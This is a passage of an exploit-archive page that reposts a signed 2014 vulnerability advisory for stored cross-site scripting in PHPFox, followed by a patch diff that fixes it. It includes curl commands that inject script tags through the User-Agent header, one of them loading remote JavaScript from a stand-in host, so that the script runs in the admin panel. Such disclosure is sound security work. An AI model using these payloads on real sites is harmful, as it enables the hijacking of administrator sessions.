Home / exploits PHPFox Cross Site Scripting
Posted on 19 November 2014
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CNA primary MITRE Corporation ( cve-assign [ \**NOSPAM\ ] mitre \NOSPAM\ org ) Software Vendors http://moxi9.com/phpfox Product: PhpFox Version: ALL Research Wesley Henrique Leite ( wesleyhenrique [\NOSPAM**] gmail \NOSPAM// com ) [+] INFORMATION Vendor Notified : 2014-10-22 Vendor Homepage : http://moxi9.com/phpfox Response Vendor: fixed 2014-10-23 (to v4 Beta) [+] DESCRIPTION The system stores all urls accessed in a database table, below information in the same 'phpfox_log_session' [phpfox]> desc phpfox_log_session; +---------------+----------------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +---------------+----------------------+------+-----+---------+-------+ | session_hash | char(32) | NO | MUL | NULL | | | id_hash | char(32) | NO | | NULL | | | captcha_hash | char(32) | YES | MUL | NULL | | | user_id | int(10) unsigned | NO | MUL | NULL | | | last_activity | int(10) unsigned | NO | MUL | NULL | | | location | varchar(255) | YES | | NULL | | | is_forum | tinyint(1) | NO | | NULL | | | forum_id | smallint(4) unsigned | NO | | NULL | | | im_status | tinyint(1) | NO | | 0 | | | im_hide | tinyint(1) | NO | | 0 | | | ip_address | varchar(15) | NO | | NULL | | | user_agent | varchar(100) | NO | | NULL | | +---------------+----------------------+------+-----+---------+-------+ the column that can be manipulated is: -> user_agent (100) all acess store in the system, such as bots and users wandering around the web site, can be seen in: AdminCP TOOLS > Online > Guests/Boots Output | IP ADDRESS | User-Agent | ... knowing this, the following code was created to inject a script into the AdminCP with User-Agent. $ curl -A "<script src='http://www.example.com/script.js'></script>" http://www.meusite.com.br/ OR $ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/ when any user with administrative access in. 'AdminCP' TOOLS > Online > Guests/Boots we have the script running in the administrative area. [+] My Solution (line 1.8) 1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 10:00:11 2014 -0200 1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 12:28:39 2014 -0200 1.3 @@ -25,7 +25,7 @@ 1.4 {foreach from=$aGuests key=iKey item=aGuest} 1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}"> 1.6 <td><a href="{url link='admincp.core.ip' search=$aGuest.ip_address_search}" title="{phrase var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td> 1.7 - <td>{$aGuest.user_agent}</td> 1.8 + <td>{$aGuest.user_agent|strip_tags}</td> 1.9 <td class="t_center"> 1.10 <div class="js_item_is_active"{if !$aGuest.ban_id} style="display:none;"{/if}> 1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0" class="js_item_active_link" title="{phrase var='admincp.unban'}">{img theme='misc/bullet_green.png' alt=''}</a> 1.12 @@ -43,4 +43,4 @@ 1.13 <div class="extra_info"> 1.14 {phrase var='admincp.no_guests_online'} 1.15 </div> 1.16 -{/if} 1.17 No newline at end of file 1.18 +{/if} -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQIcBAEBAgAGBQJUZLi0AAoJEDGxib0S8PLVo48P/2rcvW9s777zPbcqAW2T8ymd OQN2wOnZeCWqAJOIWxOQCXUuPjmuEkXuH/rxn8scBTKY3iluv1uy53w+DwP3gsDm 3r4uur1W28soZ6/uyEQvySfI202gY5nOS1e07ezIrIm7Q9Fc6ibYVtmJ/A04gWEA DIz1otTEB47/4tHGcm651DOOoSmLLEWImpUzUZgBKXlU2OdsLMPDvempTBPsqGCl ENWI86kUUIQ18xhHttAGY96fjYWEXW4bogg4O5G3E9TUEsEXf+qo2pUrPT+AJNMA 2HS+jzPhnmhhGsufQ9m7VxY8tsBM/ciiGQNeHrOGDiZtR2sSaXDW8eCgs1W+Hwbb CKtqG2CTgL7YADI1I7qo6b24GDz2NqeICaFoOvt2WsqD51WVtTfLctMAIKsM9jGF Jtflp44QMbH+DS0QklvL1N6vifgosFkzUejDRZGmQ/gOntlrBLfOsmJMEvuE38ip G4eocs5Cl4dIVwEioLjw2RT9xGxAhkCsBZaD+UTGA+VfRo5KvNnHCYtarmL8RJAK tWQtVuO/wAY5rk38hBooqWXrSYWgor1cFr69YZngp8ersnW4BS4dSiZju3vT91+a LEA+nugK6GUdCsD3JNRjuVSI7KKtjWL9DQD4WxN1EhSQ9EzPHXx8PciVUe/QplBU k6e1xQ6TG1PM8XwOHJGJ =twLD -----END PGP SIGNATURE-----
